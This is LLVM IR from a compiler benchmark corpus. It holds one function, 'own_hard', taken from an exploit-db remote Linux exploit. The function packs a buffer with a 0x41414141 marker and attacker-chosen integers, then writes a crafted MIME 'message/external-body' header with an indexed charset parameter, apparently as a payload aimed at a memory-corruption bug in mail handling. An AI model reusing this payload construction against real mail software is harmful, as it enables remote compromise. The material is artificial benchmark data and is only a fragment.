; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/linux/remote/extr_99.c_own_hard.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/linux/remote/extr_99.c_own_hard.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@mail = common dso_local global i64 0, align 8
@.str = private unnamed_addr constant [122 x i8] c"Content-Type: message/external-body;\0A access-type=\22%s\22;\0A charset*%u*=\22%s\22;\0AContent-Transfer-Encoding: 8bit\0A--sorbo-rox--\0A\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local void @own_hard(i32 %0, i32 %1, i32 %2, i32 %3, i8* %4) #0 {
  %6 = alloca i32, align 4
  %7 = alloca i32, align 4
  %8 = alloca i32, align 4
  %9 = alloca i32, align 4
  %10 = alloca i8*, align 8
  %11 = alloca [1024 x i8], align 16
  %12 = alloca i32*, align 8
  store i32 %0, i32* %6, align 4
  store i32 %1, i32* %7, align 4
  store i32 %2, i32* %8, align 4
  store i32 %3, i32* %9, align 4
  store i8* %4, i8** %10, align 8
  %13 = getelementptr inbounds [1024 x i8], [1024 x i8]* %11, i64 0, i64 0
  %14 = bitcast i8* %13 to i32*
  store i32* %14, i32** %12, align 8
  %15 = load i32*, i32** %12, align 8
  store i32 1094795585, i32* %15, align 4
  %16 = load i32*, i32** %12, align 8
  %17 = getelementptr inbounds i32, i32* %16, i32 1
  store i32* %17, i32** %12, align 8
  %18 = load i32, i32* %6, align 4
  %19 = load i32*, i32** %12, align 8
  store i32 %18, i32* %19, align 4
  %20 = load i32*, i32** %12, align 8
  %21 = getelementptr inbounds i32, i32* %20, i32 1
  store i32* %21, i32** %12, align 8
  %22 = load i32, i32* %7, align 4
  %23 = load i32*, i32** %12, align 8
  store i32 %22, i32* %23, align 4
  %24 = load i32*, i32** %12, align 8
  %25 = getelementptr inbounds i32, i32* %24, i32 1
  store i32* %25, i32** %12, align 8
  %26 = load i32, i32* %8, align 4
  %27 = load i32*, i32** %12, align 8
  store i32 %26, i32* %27, align 4
  %28 = load i32*, i32** %12, align 8
  %29 = getelementptr inbounds i32, i32* %28, i32 1
  store i32* %29, i32** %12, align 8
  %30 = load i32*, i32** %12, align 8
  store i32 0, i32* %30, align 4
  %31 = load i64, i64* @mail, align 8
  %32 = load i64, i64* @mail, align 8
  %33 = call i64 @strlen(i64 %32)
  %34 = add nsw i64 %31, %33
  %35 = load i8*, i8** %10, align 8
  %36 = load i32, i32* %9, align 4
  %37 = call i32 @num(i32 %36)
  %38 = getelementptr inbounds [1024 x i8], [1024 x i8]* %11, i64 0, i64 0
  %39 = call i32 @sprintf(i64 %34, i8* getelementptr inbounds ([122 x i8], [122 x i8]* @.str, i64 0, i64 0), i8* %35, i32 %37, i8* %38)
  ret void
}

declare dso_local i32 @sprintf(i64, i8*, i8*, i32, i8*) #1

declare dso_local i64 @strlen(i64) #1

declare dso_local i32 @num(i32) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
